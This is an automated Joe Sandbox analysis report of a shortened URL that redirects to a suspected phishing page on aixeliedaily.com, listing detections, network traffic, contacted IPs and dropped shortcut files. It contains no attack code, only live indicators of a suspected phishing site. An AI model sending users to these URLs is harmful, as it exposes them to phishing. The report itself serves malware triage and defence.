Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://dub.sh/vu352zF

Overview

General Information

Sample URL:https://dub.sh/vu352zF
Analysis ID:1540570
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected obfuscated html page
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 5452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_65JoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    dropped/chromecache_64JoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-23T22:58:08.961008+020020566432Possible Social Engineering Attempted192.168.2.1649704192.254.233.44443TCP

      Joe Sandbox Signatures

      • Phishing
      • Compliance
      • Networking
      • System Summary
      • Boot Survival

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: dropped/chromecache_65, type: DROPPED
      Source: Yara matchFile source: dropped/chromecache_64, type: DROPPED
      Source: https://aixeliedaily.com/m/HTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: dub.sh to https://aixeliedaily.com/m/
      Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49704 -> 192.254.233.44:443
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: global trafficHTTP traffic detected: GET /vu352zF HTTP/1.1Host: dub.shConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/ HTTP/1.1Host: aixeliedaily.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/TYPEXXX HTTP/1.1Host: aixeliedaily.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://aixeliedaily.com/m/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://aixeliedaily.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://aixeliedaily.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: aixeliedaily.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://aixeliedaily.com/m/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: aixeliedaily.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficDNS traffic detected: DNS query: dub.sh
      Source: global trafficDNS traffic detected: DNS query: aixeliedaily.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: unknownHTTP traffic detected: POST /m/ HTTP/1.1Host: aixeliedaily.comConnection: keep-aliveContent-Length: 138444Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://aixeliedaily.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://aixeliedaily.com/m/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 20:58:10 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aixeliedaily.com/index.php/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
      Source: chromecache_62.1.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: classification engineClassification label: mal48.phis.win@18/14@12/7
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder      		1
      Process Injection      		1
      Masquerading      		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder      		1
      Process Injection      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer      		Traffic DuplicationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540570 URL: https://dub.sh/vu352zF Startdate: 23/10/2024 Architecture: WINDOWS Score: 48 24 Yara detected obfuscated html page 2->24 6 chrome.exe 9 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.16, 138, 443, 49214 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 aixeliedaily.com 192.254.233.44, 443, 49701, 49703 UNIFIEDLAYER-AS-1US United States 11->18 20 www.google.com 142.250.186.68, 443, 49705, 49720 GOOGLEUS United States 11->20 22 4 other IPs or domains 11->22

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Download Network PCAP: filteredfull

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      dub.sh
      		76.76.21.123
      		truefalse
        		unknown
        aixeliedaily.com
        		192.254.233.44
        		truefalse
          		unknown
          d2vgu95hoyrpkh.cloudfront.net
          		18.245.31.33
          		truefalse
            		unknown
            www.google.com
            		142.250.186.68
            		truefalse
              		unknown
              cdn.socket.io
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://aixeliedaily.com/m/TYPEXXXfalse
                  		unknown
                  https://aixeliedaily.com/favicon.icofalse
                    		unknown
                    https://aixeliedaily.com/m/false
                      		unknown
                      https://dub.sh/vu352zFfalse
                        		unknown
                        https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.186.68
                          		www.google.comUnited States
                          		15169GOOGLEUSfalse
                          76.76.21.123
                          		dub.shUnited States
                          		16509AMAZON-02USfalse
                          18.245.31.33
                          		d2vgu95hoyrpkh.cloudfront.netUnited States
                          		16509AMAZON-02USfalse
                          239.255.255.250
                          		unknownReserved
                          		unknownunknownfalse
                          18.245.31.5
                          		unknownUnited States
                          		16509AMAZON-02USfalse
                          192.254.233.44
                          		aixeliedaily.comUnited States
                          		46606UNIFIEDLAYER-AS-1USfalse

                          Private

                          IP
                          192.168.2.16

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1540570
                          Start date and time:2024-10-23 22:57:36 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://dub.sh/vu352zF
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal48.phis.win@18/14@12/7
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.186.67, 108.177.15.84, 142.250.74.206, 34.104.35.123, 199.232.214.172, 142.250.184.227, 142.250.186.142
                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: https://dub.sh/vu352zF

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.981988447135065
                          Encrypted:false
                          SSDEEP:48:8qvOdiTuW7HMeidAKZdA1FehwiZUklqehu3y+3:8qbDAMF3y
                          MD5:02F12536E8AD552EE241B4ED0E21F484
                          SHA1:A08520EA4C245C94F257244B0E31BF233B2E6579
                          SHA-256:A85793183D027185F0B42BAC8B4E2AD82F1FBF9F274B530492ACA4320593EEA1
                          SHA-512:24C77BA9802504A13F3F3B33BA82D8C2B1ACC809E5799213F62F3D22AB2E12E33B58D600166D1E463C479CBA24278BC4A78DF856648F1502DCDA641F8EA88393
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.@.. ...$+.,.......B.%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWYB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWYB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWYB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWYC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

